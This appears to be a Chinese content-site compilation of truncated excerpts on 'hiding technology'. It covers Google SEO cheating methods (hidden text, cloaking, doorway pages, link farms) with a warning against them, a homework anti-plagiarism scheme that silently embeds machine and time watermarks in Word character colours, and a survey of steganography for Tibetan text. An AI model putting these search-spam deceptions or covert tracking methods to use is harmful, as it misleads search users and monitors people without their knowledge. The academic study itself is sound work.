時間:2022-05-03 03:53:40
序論:好文章的創作是一個不斷探索和完善的過程,我們為您推薦十篇隱藏技術論文范例,希望它們能助您一臂之力,提升您的閱讀品質,帶來更深刻的閱讀感受。
第二定律人氣質量定律
類似于科學引文索引的機制,說白了就是誰的論文被引用次數多,誰就被認為是權威,論文就是好論文。這個思路移植到網上就是誰的網頁被鏈接次數多,那個網頁就被認為是質量高,人氣旺。在加上相應的鏈接文字分析,就可以用在搜索結果的排序上了。這就引出了Google優化的第二定律:人氣質量定律。根據這一定律,Google搜索結果的相關性排序,并不完全依賴于詞頻統計,Google優化更多地依賴于超鏈分析
第三定律自信心定律
人氣質量定律解決的還是一個技術層面的問題,然而Google從誕生的那一天起,從來就不是一個純技術現像,它融合了技術,文化,市場等各個層面的因素。解決搜索引擎公司的生存和發展問題需要Google的第三定律–自信心定律。
Google優化作弊手法:一:隱藏文本/隱藏鏈接
隱藏文本內容隱藏鏈接
二:網頁與Google描述不符
一般發生于先向Google提交一個網站,等該網站被收錄后再以其它頁面替換該網站。“誘餌行為”就屬于此類偷梁換柱之舉–創建一個優化頁和一個普通頁,然后把優化頁提交給Google,當優化頁被Google收錄后再以普通頁取而代之。
三:誤導性或重復性關鍵詞
誤導性關鍵詞重復性關鍵詞
四:隱形頁面
對實際訪問者或搜索引擎任一方隱藏真實網站內容,以向搜索引擎提供非真實的搜索引擎友好的內容提升排名。
五:欺騙性重定向
指把用戶訪問的第一個頁面(著陸頁)迅速重定向至一個內容完全不同的頁面
六:門頁
是為某些關鍵字特別制作的頁面,專為Google設計,目的是提高特定關鍵詞在Google中的排名所設計的富含目標關鍵詞的域名,且重定向至另一域名的真實網站。Google的Spiders往往忽略對那些自動重定向到其它頁的頁面的檢索。
七:復制的站點或網頁
最常見的當屬鏡象站點。通過復制網站或卬頁的內容并分配以不同域名和服務器,以此欺騙Google對同一站點或同一頁面進行多次索引。現在Google提供有能夠檢測鏡象站點的適當的過濾系統,一旦發覺鏡象站點,則源站點和鏡象站點都會被從索引數據庫中刪除
八:作弊鏈接技術/惡意鏈接
典型的作弊鏈接技術包括:
鏈接工廠
大宗鏈接交換程序
交叉鏈接
以上Google優化作弊技術Google目前已經可以監控出來,我們建議各位在做Google優化時不要使用上面列舉的作弊技術!
正確的Google優化技術:1、標題
在網頁的標題(Title標簽)加上關鍵詞,關鍵詞數不要過多,建議為1到3個。
2、KeyWords(關鍵詞)
KeyWords現在在Google優化規則里面不是很受重視,但是,我們必要做到的是,盡一切能力進行優化,所以,也是一定要做的。
3、Dscription(描述)
Dscription0盡可能的反復出現需要優化的關鍵詞,但是語法一定要通順,流暢。符合瀏覽者搜索該關鍵詞的用意以及感受。也要符合網頁內容的含義,最好能概括網頁的內容,杜絕虛假。
4、網站框架結構
盡量少使用圖片、FLASH、JS等文件,讓Google更好的抓去站點的信息,站內鏈接要合理的設計。
中圖分類號:TP311 文獻標識碼:A 文章編號:1009-3044(2012)36-8679-02
隨著計算機應用的普及,高校正在逐步實現作業的電子化和網絡化。這種作業形式的改革有效減少了教育資源的浪費,減輕了教師的工作任務,提高了學生獲得作業批閱結果的效率,教與學得到了互動。應該說作業的電子化是高校教學改革的一種必然趨勢,但隨之而來的是電子作業抄襲現象嚴重。學生抄襲作業時,少則部分復制他人文檔,調整文檔順序,內容稍做修改;多則大部分甚至全盤拷貝他人文檔。學生對于電子作業的抄襲輕松快捷又不易被識別,這就成為作業改革受到嚴重困擾的主要因素。
在電子作業的反抄襲檢查工作上,教師的手工操作既耗時又費力,尤以高校學生人數眾多,涉及的教師面而變得局限性很大。那么,建立一種快速、準確、高校的電子作業反抄襲檢查模型若能夠有效遏制了學生間電子作業相互拷貝,具有十分現實的意義。目的在于能夠極大地提高教學的質量和效率,并有力的促進高校的教育改革。在應用領域抄襲檢測算法已成為當前研究的熱點話題,尤其是在學術論文的剽竊比對上。而我們能夠在平時的教學工作中有效地抵制電子作業的抄襲現象,既能真實反映教學效果又能提高學生自主學習的意識和能力。這不僅是對于教學工作的促進更是培養人教育人的有效途徑。
1 抄襲檢查技術
計算機技術的發展和網絡普遍應用,在無意間方便了很多人進行文章抄襲。其實電子作業抄襲現象是國內外的大學廣泛存在的現象,為了有力遏制學生的這種不誠信的行為,國外早在20世紀90年代就開始了相應研究。由于西方語系的特點英語是以空格作為單詞間隔,因此英語的抄襲檢查方法是通過比較關鍵詞來判斷相似性的,效率很高。而中文與外文間存在著巨大的差異性, 強調詞法與句法,因此關鍵詞比對較不適用于中文。
目前中文的抄襲檢查方法主要有基于字符串的匹配、基于統計的中文分詞、文檔指紋、句子相似度等。
2 電子作業反抄襲檢查的實現
該文主要采用兩種方法以實現電子作業的反抄襲檢查:數字指紋技術和信息隱藏技術。首先吸取了文數字指紋技術的優勢并對于指紋技術的算法(Hash函數)做出改進提出一種基于局部詞頻的指紋算法。其次很多高校特有應用的實驗實習電子作業,此時內容都較為相似,所以該文又增加了基于信息隱藏技術的作業反抄襲檢查方法,以對于這類電子作業進行有效的比對。
2.1基于局部詞頻的指紋技術
文檔數字指紋技術是依據生成的待比較的文檔指紋,通過在樣本庫中做對比進行抄襲檢測。當相匹配指紋數目超過一定值時,可認定存在抄襲行為。為使其具有推廣力,一般會引入松弛因子以提高檢測的準確性。指紋生成算法是文檔數字指紋技術的關鍵,一般利用 Hash 函數對文檔中的特征標記進行計算,獲得整數值。一般需要計算函數。
在高校的電子作業中很多都僅是對作業的句子的長度或詞語的先后次序作了調整,內容的變化是較小的,用這種方法就會過度精確,用于檢查電子作業效率很低。所以該文對這種算法做出一定改進,提出一種基于詞頻統計的指紋技術。局部詞頻統計技術借助于向量空間模型來實現。這種向量空間模型是由句子為單位構成的,并對句子進行關鍵詞提取,并對關鍵詞重新排序構建,根據編碼與詞頻共同獲取句子的指紋。依據句子的指紋獲取文本相似度,具體的算法描述
2.2信息隱藏技術
在高校學生作業有一些是比較特殊的,例如在機房中完成的實驗實習類報告,這類作業的特點是內容大致是相同的。可以在作業的源頭采用一些基于信息隱藏的嵌入水印算法。在對作業進行片段拷貝時就在源頭嵌入水印,能有效的防止拷貝抄襲的現象發生。這樣即使電子作業的內容完全相同也能有效的檢查到。不能輕易被破壞。這類作業防抄襲檢查的水印嵌入既要求字符格式改變不易被擦覺也要兼顧有較大的信息嵌入量,不需太多的字符就能嵌入進機房的機器號及上機完成作業的時間。
由于人眼的視細胞對顏色敏感度的理論指出人眼對綠色最敏感,其次是紅色,而對于藍色是最不敏感的。而計算機的顏色設置理論是數字化的,所以可以對于RGB()的值中低位的值做秘密信息嵌入。可以對R值和G值改變都改變最低的1位bit,而對B值最低的2位bit。這樣就對每個電子文檔的字符嵌入了4位bit的信息隱藏,并把這4位二進制作為嵌入信息隱藏1Byte的高4位。同時也可以利用字符下劃線的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit來隱藏4位信息。這4位bit作為嵌入信息隱藏1Byte的低4位。
在實際操作中程序所嵌入的信息包括程序讀取的機器號及上機時間與機房管理系統數據庫配合能準確定位學生的學號、姓名、班級等。當學生完成自己的電子作業過程中點擊保存、Word程序自動保存、關閉Word文檔時都會觸發這一嵌入秘密信息的相關程序的運行,可以在全文實現循環嵌入秘密信息的作用。該反抄襲程序是在打開作業文檔時自動運行,能自主識別學生作業中具有抄襲嫌疑的片段,協助教師對學生的作業給出客觀評價,有效的對這類作業的抄襲起到屏蔽的作用。
3 結束語
在以往的反抄襲檢查中主要是通過文檔間內容重疊程度或者相似程度來斷定的,相關的檢查技術也很多也較成熟。但往往面對的是海量數據或是長文檔,并需要對文檔字符做精確檢查。而在教學過程中的電子作業無論在內容、篇幅和數量方面都有很大差別。
該文的創新點是結合了基于局部詞頻的指紋技術和嵌入水印的信息隱藏技術,提出了一處主要針對高校的作業特點的反抄襲檢查的模型。較為全面的考慮到了這類作業不同于學術剽竊的相關問題,所建立的這種快速、準確、高效的電子作業反抄襲檢查模型能夠在一定程度上遏制學生間電子作業相互拷貝,具有十分現實的意義。
參考文獻:
[1] 蔣波.一種基于三重DES和RSA的綜合加密方案[J].微計算機信息,2007(18).
[2] 陳國良.并行算法實踐[M].北京:高等教育出版社,2004.
[3] 秦玉平,冷強奎,王秀坤,等. 基于局部詞頻指紋的論文抄襲檢測算法[J].計算機工程,2011(6).
中圖分類號:TN401 文獻標識碼:A 文章編號:2095-1302(2014)12-00-05
0 引 言
安全、有效的信息傳輸對國家安全、社會穩定和人民安居樂業至關重要。網絡和多媒體技術的發展,使得信息傳輸的速度和數量正以驚人的增量發展。然而,信息傳輸的便利在方便人們的同時也給信息安全帶來了隱患,同時也為基于數字載體的秘密信息傳輸提供了廣闊的研究空間。目前,基于載體的秘密信息傳輸是信息安全領域的一個方興未艾的研究熱點。而基于載體預處理的藏文信息隱藏技術將為信息安全領域提供一些新的數字信息共享和傳輸理念,特別是藏文的預處理規律、在數字信息中的隱藏規律等,將有助于涉藏秘密通信技術的發展,并可以對民用和商用領域中涉及到藏文內容的傳輸、共享、存儲和提取的通信過程起到安全保護、版權保護及完整性認證的作用,并對國家涉藏領域的網絡輿情監控、國內外涉藏敏感信息標注和情感色彩認知起著至關重要的作用。
在藏文信息隱藏技術方面,目前主要涉及的技術有關鍵字識別、字符識別和提取、韻律認知、語義角色標注、文本資源挖掘和語料抽取等,并以此為基礎進行置亂優化。
1 國內外信息隱藏技術研究現狀
信息隱藏一直是信息安全領域中保障隱秘信息安全傳輸和數字信息版權的重要手段,也是近年來國內外學者研究的熱點之一。最新的一屆ACM信息隱藏和多媒體安全會議(ACM IH&MMSec’13 Workshop)的主要研究內容有信息隱藏算法、多媒體水印和認證、載體運算域的數字信號處理等。其中,信息隱藏算法的設計首先依賴于載體的選擇和預處理;關于多媒體水印和認證的研究則將信息隱藏和數字水印的載體范圍從數字圖像等常見載體拓展到了包括三維模型在內的新型載體上;載體運算域的數字信號處理涉及到了載體預處理時所用的具體方法,如空間域或變換域等。2013年IEEE 圖像處理國際會議(IEEE ICIP 2013)的主要研究內容包括圖像、音視頻和3-D等多媒體的信息隱藏算法和多媒體特征提取和分析等,這兩類研究內容均與載體的選取和預處理有關。最新一屆信息隱藏國際會議(IH2012)的主要研究內容包括多媒體安全和其他載體的信息隱藏。我國的第十一屆全國信息隱藏暨多媒體安全學術大會(CIHW2013)中關于信息隱藏算法的研究內容也主要集中在非常規載體的分析和預處理上。
藏文作為信息隱藏領域一種新的信息格式,對其研究主要局限于藏文操作系統、藏文信息技術標準、藏文信息處理等幾個方面[1],具體內容集中在藏文編碼字符集、術語集、拼音輔助集等的建立。
基于載體的秘密通信技術是20世紀90年代中期發展起來的跨領域的學科,而載體的預處理技術一直是其研究的主要方向。對隱藏載體進行預處理,生成信息隱藏嵌入區域是信息隱藏算法中最重要的研究內容之一。從上述國內外各學術會議中關于信息隱藏的參會論文和研討情況看,各類載體固有特性的研究對預處理技術有著重要的意義,且數字圖像依然是主要的一類載體,而三維模型將是未來主要研究的一類非常規載體。下面就對數字圖像和三維模型兩類載體的預處理技術的研究現狀進行闡述。
1.1 數字圖像預處理技術研究綜述
基于數字圖像的信息隱藏技術是信息隱藏學科中重要的技術分支,是目前應用最廣、覆蓋范圍最大的信息隱藏技術手段。在基于數字圖像的信息隱藏技術研究中,信息隱藏區域的生成是關系算法性能的重要因素。信息隱藏區域的生成方法主要包括空間域生成法、變換域生成法以及空間域和變換域聯合的生成方法。
空間域算法:作為空間域算法中出現最早、操作最簡單且應用最廣泛的算法,基于位平面分解理論的LSB算法可以直接替換的方式隱藏較大的數據量,劉紅翼等提出的一種LSB算法具有容量大、運算量小的特點[2];劉文彬等提出的LSB隱寫替換的消息定位方法則可以對此類算法進行檢測[3];而IH2012的論文中,有學者運用假設檢驗理論和含秘載體的奇偶感知特性可有效地檢測LSB算法所隱藏的隱秘信息[4,5],這些研究為藏文信息隱藏中涉及到關于此類算法的抗檢測性研究提供了新的待改進方向。張焱等提出的像素值排序和趙彥濤等提出的直方圖修改等空間域算法在沿用LSB直接替換的隱藏理念的同時,還提升了魯棒性,因此也被廣泛用于數字圖像載體預處理[6,7];隨后,楊春芳等提出了針對此類算法的檢測方法[8],這也為針對此類算法抗檢測性改進的研究提供了重要依據。此外,上述同類算法中的載體子區域劃分思想、內容自適應思想等也對本項目基于載體結構特性建立空間匹配模型的機制提供了方法學上的有力支持[9-13]。
變換域算法:不同于空間域算法直接對載體的空間特性進行修改,變換域預處理方法以修改載體的頻率參數來隱藏信息[14],因此算法的魯棒性比空間域算法好。在此基礎上,唐燕等又對隱秘信息的檢測和恢復進行了研究和改進,實現了幾乎無需原始參量的半盲提取[15]。盡管變換域算法不具備空間域算法容量大、運算量小和易操作等優勢,但是變換域中的多小波理論因其同時具有對稱性、短支撐性、二階消失矩和正交性等特性成為了信號處理中有明顯優勢且較常用的方法,在前期研究中利用多小波方法將數字圖像載體分塊后作為嵌入區域,提高了算法的魯棒性和不可見性[16,17],這種方法為在藏文信息隱藏研究中建立基于區域能量的階梯性分布機制提供了一種研究手段。
混合域算法:較單獨運用一種空間域或變換域生成隱藏區域并設計信息隱藏算法來看,基于空間域與變換域聯合的信息隱藏算法可以兼有多種算法的性能優勢。在基于空間域和變換域聯合的信息隱藏算法中,空間域的作用體現在數據嵌入的具體操作方面,因為隱藏的實質就是在當前環境下的空間分量上進行數據修改,利用邊緣像素值差分(Edged Pixel Value Differencing,EPVD)將載體換算為若干個像素塊,以最大斜角的數據修改作為信息隱藏的具體方法[18];利用濕紙碼和基于LSBM的雙層隱寫來對載體進行加1嵌入或減1嵌入[19];另外,國內外許多學者利用調色板理論進行數據嵌入[20,21]。而變換域在載體預處理中的主要作用是生成滿足特定需要的信息隱藏環境(區域),主要包括變換后的系數分布以及n階分量子圖等。如對RSV顏色空間的V分量做DCT變換,分塊后作為嵌入區域[22];利用視覺顯著點技術確定跟蹤窗(Regions of Interest,ROI),在ROI的DCT系數上嵌入隱藏信息,并指定某個ROI邊緣地圖脆弱性標識,嵌入到DWT變換后的含密圖像中[23];前期研究中,研究人員利用自適應顏色遷移理論中lαβ域對顏色的控制力,消除了RGB顏色分量的強相關性,并結合GHM能量分區隱藏信息,在不可見性、嵌入信息量和魯棒性方面均具有較好的表現[24]。
1.2 三維模型預處理技術研究綜述
潘志庚等將基于三維模型的信息隱藏預處理方法主要分為空間域算法和變換域算法[25]。這也這為藏文信息隱藏研究提供了新的思路和方法。
空間域算法:空間域算法通常具有易嵌入和盲提取的特點,如直接置換載體的幾何信息來隱藏數據是三維模型載體信息隱藏最原始、最直接的方法[26]。為改進此類算法的魯棒性,引入仿射不變量是有效的措施,如利用具有連續解析性的仿射不變量優化需要置換的頂點[27]、 將穩態錨點通過三角垂心編碼解析為聚類元素從而嵌入隱秘信息[28]。此外,基于主元分析的算法也有助于改善空間域算法的魯棒性,例如可根據主元分析(Primary Component Analysis,PCA)來確定模型的關鍵位置作為魯棒區域,并用網格分割法改進魯棒性和不可見性[29-32]。這類算法也為藏文信息隱藏從載體結構特性進行解析和預處理提供了理論依據。改進型的空間域算法多針對魯棒性或容量性有所提升,如基于連續解析性的體積矩的盲算法,改善了之前算法對連通性攻擊的魯棒性[33];通過重排頂點和面片在網格文件中的表示信息,利用表示域內的信息進行嵌入使算法具有良好的不可見性和大容量性[34],但對相似變換以外的攻擊不具有魯棒性。
變換域算法:三維模型預處理的變換域方法大多利用頻譜分析將模型信息參數化[35],對參數進行少量修改后以隱藏信息,其中,基于小波變換的算法可以對規則和非規則網格模型進行小波域參量修改以嵌入較多信息[36]。理論上,變換域算法比空間域算法魯棒性強,但由于三維模型頂點的天然無序性和不規則性,對其進行頻譜分析難度大,導致變換域算法實用性目前較低,因此空間域算法依然是比變換域算法更有實用價值的研究方向[37]。
2 藏文信息隱藏技術研究現狀
目前反映藏文信息處理技術最新進展的文獻較少,綜合以已有的研究成果及相關研究文獻,藏文信息處理可劃分為藏語信息處理和藏字信息處理兩個層次[38,39]。藏語信息處理包括機器翻譯、信息檢索、信息提取、文本校對、文本生成、文本分類、自動摘要以及藏文字識別和語音識別的后處理等等;而藏字信息處理包括操作系統以及編碼字符集、輸入技術、字形描述與生成、存儲、編輯、排版、字頻統計和藏字屬性庫等。這些研究基礎對藏文信息隱藏技術的發展至關重要,是基于載體預處理的藏文信息隱藏的主要技術來源。鑒于藏文的獨特構造,以及藏文的特點,目前對藏文秘密信息的預處理技術一般指置亂和加密算法的選擇[40],而置亂使信息變得雜亂無章難以辨認,可以起到加密與改變信息嵌入特性的作用。可用于藏文信息隱藏的置亂算法主要有Arnold變換、幻方矩陣、Gray碼變換、混沌序列等方法[41]。其中,Arnold變換算法簡單且置亂效果顯著,使有意義的數字圖像變成像白噪聲一樣的無意義圖像,實現了信息的初步加密和信息結構的調整,在嵌入信息為數字圖像時可以很好的應用[42]。幻方置亂的思想基于查表思想,基于數字圖像的幻方置亂可降低幻方置亂階數或以圖像塊進行置亂,實現置亂效果與系統開銷的平衡[43]。Gray是一種具有反射特性和循環特性的單步自補碼,它的循環、單步特性消除了隨機取數時出現重大誤差的可能,它的反射、自補特性使得求反非常方便[44]。混沌的優勢在于對初始條件的極端敏感和軌跡在整個空間上的遍歷性。根據經典的Shannon置亂與擴散的要求,這些獨特的特征使得混沌映射成為信息隱藏嵌入算法的優秀候選[45]。上述傳統的置亂算法一般用于正方形圖像處理,而經過改進的Arnold算法可直接用于寬高不等的矩形圖像而不必進行正方形擴展[46],這也將是藏文信息隱藏技術所采用的主要置亂方法之一。
3 藏文信息隱藏技術的研究目標、研究內容和要解決的問題
3.1 研究目標
面向藏文安全通信的高性能信息隱藏算法是目前藏文信息隱藏技術的主要目標,包括提出性能出色的、適合藏文通信要求的信息隱藏算法;提出一種具有普適性的高性能信息隱藏嵌入區域生成原則和嵌入規則:
(1) 基于數字圖像的藏文信息隱藏算法:提出至少兩種基于數字圖像的藏文信息隱藏算法,算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(PSNR≥34.90dB)、強魯棒性(抗擊大約69%以下的JPEG2000壓縮、35%以下的剪切及常見濾波與加噪)、大容量性(基于彩色圖像的信息隱藏信息嵌入率≥18%)以及高感知篡改性(檢測隱藏數據是否被篡改能力≥95%)。
(2) 基于三維模型的藏文信息隱藏算法:提出至少一種基于三維模型的藏文信息隱藏算法。算法將同時滿足面向藏文安全的信息隱藏應用所要求的高不可見性(RSNR≥69.94dB、En≥70%)、應對一般攻擊的強魯棒性(抗擊大約0.10%隨機加噪、50-times Laplacian平滑、50%均勻重網格化以及均勻簡化等)、大容量性(相對理想的RSNR,嵌入率≥29%)以及低復雜度(根據載體模型幾何信息量而變化)。
(3) 普適性信息隱藏嵌入區域生成原則和嵌入規則:利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則,將適應于所有對數字圖像處理后有能量區別的圖像處理方法,指導設計者利用能量與魯棒性、復雜度與不可見性的對應關系,研究出同時滿足不可見性和魯棒性的信息隱藏算法。
3.2 研究內容
(1) 藏文信息隱藏區域生成原則與規則研究:數字圖像信息隱藏技術的研究核心集中在隱藏區域和嵌入規則的設計上,藏文信息隱藏算法的設計方法和思路就是在選定藏文信息隱藏區域以及制定好信息隱藏規則后,按照一定的順序將兩者進行合理的組織,所以研究藏文信息隱藏區域生成原則以及信息隱藏規則是重點。
(2) 基于數字圖像的藏文信息隱藏算法研究:隱藏算法是基于數字圖像的信息隱藏技術的研究核心,需按照嵌入域進行劃分,對基于空間域和基于變換域的信息隱藏算法分別進行研究,提出單獨基于空間域、單獨基于變換域以及兩者聯合應用的數字圖像信息隱藏算法。
(3) 基于三維模型的藏文信息隱藏算法研究:首先對三維模型的結構特性和能量特性進行研究,再根據載體模型的特性找出對應的預處理方法。在研究基于空間域和基于變換域的信息隱藏算法的基礎上,提出改進型的三維模型信息隱藏算法。主要用于提升載體有效嵌入容量和降低載體視覺失真度。
(4) 載體與藏文秘密信息的一致化方法研究:基于上述研究基礎,生成結構和能量差異化子區域,再將藏文秘密信息按照拼音屬性進行解析生成信息序列。再利用優化算法使得預處理后的載體信息和藏文秘密信息的解析編碼獲得最大一致化,從而提高算法性能。
3.3 需解決的關鍵問題
綜合已有的研究,在藏文信息隱藏技術方面,目前需要解決的問題有以下幾個方面:
(1) 信息隱藏區域與嵌入規則設計:在具有什么性質的區域內應用什么樣的規則進行藏文信息隱藏才可以解決“不可見性與魯棒性的對立、容量性與抗分析性的對立”問題,是藏文信息隱藏研究領域的關鍵技術之一。需找出隱藏區域的性質與信息隱藏性能的關系,提出面向藏文信息傳輸的信息隱藏區域選擇的原則與方法;給出在具有具體性質的嵌入區域中的藏文信息隱藏嵌入規則的制定原理和方法;提出大量的藏文信息數據轉換思想與方法,以提供形式多樣的信息隱藏嵌入規則。
(2) 數字圖像載體預處理方法:①多小波理論在載體預處理中的應用。對于數字圖像經過多小波變換后所具有的特殊性質,找出多小波變換后數字圖像所具有的能量特性與基于數字圖像信息隱藏算法性能之間所遵循的規律已有學者進行研究。②顏色空間的性能分析與應用選取。RGB、CMYK、lαβ、YUV以及HSx顏色空間,應用方法以及應用各有優劣勢。該技術的應用難點在于為顏色空間在藏文信息隱藏的應用提出完備的應用方案,因為這些顏色空間在藏文信息隱藏技術中的應用目前非常少,應用優劣還處于實驗驗證階段,沒有理論驗證的支持。
(3) 三維網格模型載體預處理方法:骨架抽取和內切球解析技術在藏文信息隱藏算法中的應用。這種方法不涉及頂點數量及坐標的改變和拓撲關系的修改。難點在于尋找一個理想的仿射不變量作為輔助參數以彌補算法對縮放攻擊的脆弱性。
(4) 藏文的置亂與遺傳優化算法:有的藏文字處理系統把藏文看成是由30個輔音、4個元音、3個上加字、5個下加字共42個藏文字符組成的,而有的則認為由其他數量的字符組成。基于對藏文中加字對發音的影響規律的研究,利用字符與二進制碼的解析規則和置亂與優化技術對信息置亂,達到隱藏信息與載體信息的最大匹配度也是一個技術難點。
4 藏文信息隱藏技術研究的新方法
(1)利用載體圖像能量和復雜度特性,提出基于能量性和復雜度的藏文信息隱藏區域生成原則和嵌入規則。高能量與強魯棒、高復雜度與高不可見性的對應關系,從根本上解決藏文信息隱藏算法中不可見性和魯棒性的對立問題,為面向藏文通信安全的信息隱藏算法的設計給出一種普適性方法。
(2)根據數字圖像信息隱藏嵌入區域的生成原則和嵌入規則,提出新的、高性能的數字圖像的藏文信息隱藏算法。算法利用lαβ等顏色空間轉換以及多小波對載體圖像進行的處理,生成具有不同能量特性的嵌入區域,從頻率域上滿足藏文信息隱藏的應用要求;通過對載體圖像進行顏色遷移、矢量解析以及環形處理,從數字圖像的空間結構上滿足藏文信息隱藏的應用要求。
(3)提出滿足三維模型結構特性和能量特性的藏文信息隱藏算法。算法利用局部高度理論和均值偏移理論對載體模型進行預處理,生成具有不同能量特性的嵌入區域,從頻域上滿足信息隱藏的應用要求;通過對載體圖像進行骨架抽取、內切球解析,從空間結構上滿足藏文信息隱藏的應用要求。
參考文獻
[1]陳玉忠,俞士汶. 藏文信息處理技術的研究現狀與展望[J]. 中國藏學. 2003(4):97-107.
[2]劉紅翼,王繼軍,韋月瓊,等.一種基于LSB的數字圖像信息隱藏算法[J].計算機科學,2008, 35(1):100-102.
[3]劉文彬,劉九芬.一種針對LSB替換隱寫的消息定位方法[J].信息工程大學學報,2013,14(6):641-646.
[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.
[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.
[6] 張焱,張敏情,甕佳佳.基于直方圖對的大容量信息隱藏算法[J].計算機應用研究,2013,30(7):2108-2111.
[7] 趙彥濤,李志全,董宇青.基于排序和直方圖修改的可逆信息隱藏方法[J].光電子.激光,2010,2(1):102-106.
[8] 楊春芳,劉粉林,羅向陽.基于相對熵的直方圖差異與JPEG隱寫的定量分析[J].計算機研究與發展, 2011,48(8):1563-1569.
[9] 熊志勇,王江晴.基于差分直方圖平移的彩色圖像可逆信息隱藏[J].四川大學學報,2011,43(3): 81-89.
[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.
[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.
[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.
[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.
[14]和紅杰,張家樹.對水印信息篡改魯棒的自嵌入水印算法[J].軟件學報,2009,20(2):437-450.
[15] 唐燕,閭國年,殷奎喜.規范類正交矩陣的信息隱藏算法[J].東南大學學報,2013,43(1):45-49.
[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.
[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.
[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.
[19] 奚玲,平西建,張韜.整數小波域濕紙碼自適應信息隱藏算法[J].計算機輔助設計與圖形學學報,2011,2(7):1217-1223.
[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.
[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.
[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.
[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.
[24] 任帥,張|,慕德俊,等.基于GHM多小波與自適應顏色遷移的信息隱藏算法研究[J].西北工業大學學報,2010,28(2):64-269.
[25] 潘志庚, 孫樹森, 李黎.三維模型數字水印綜述[J].計算機輔助設計與圖形學學報,2006,18(8):1103-1110.
[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.
[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.
[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.
[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.
[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.
[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.
[32] 廖學良,王屏.一種新的三維模型水印嵌入空域算法[J]. 計算機學報,2008, 31(10): 1848-1856.
[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.
[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.
[35] 胡敏,劉輝.基于特征點的自適應三維網格數字水印算法[J].合肥工業大學學報(自然科學版),2010,33(1):55-59.
[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.
[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.
[38]陳力為. 中文信息處理叢書序言[M].北京:清華大學出版社,2000.
[39]俞士汶,朱學鋒,賈玉祥. 漢語隱喻自動處理研究之概況[C].第四屆文學與信息技術國際研討會,2008.
[40] 譚良,吳波,劉震,等.一種基于混沌和小波變換的大容量音頻信息隱藏算法[J].電子學報,2010,38(8):1812-1819.
[41] 丁瑋,閆偉齊,齊東旭.基于置亂與融合的數字圖象隱藏技術及其應用[J].中國圖象圖形學報,2000,5(8):644-649.
[42] 田云凱,賈傳熒,王慶武.基于Arnold變換的圖像置亂及其恢復[J].大連海事大學學報:自然科學版,2006,32(4):107-109.
[43] 彭萬權,張承暢,馮文江,等.多階幻方卷積碼的構造及譯碼[J].電子學報,2013,41(1):123-130.
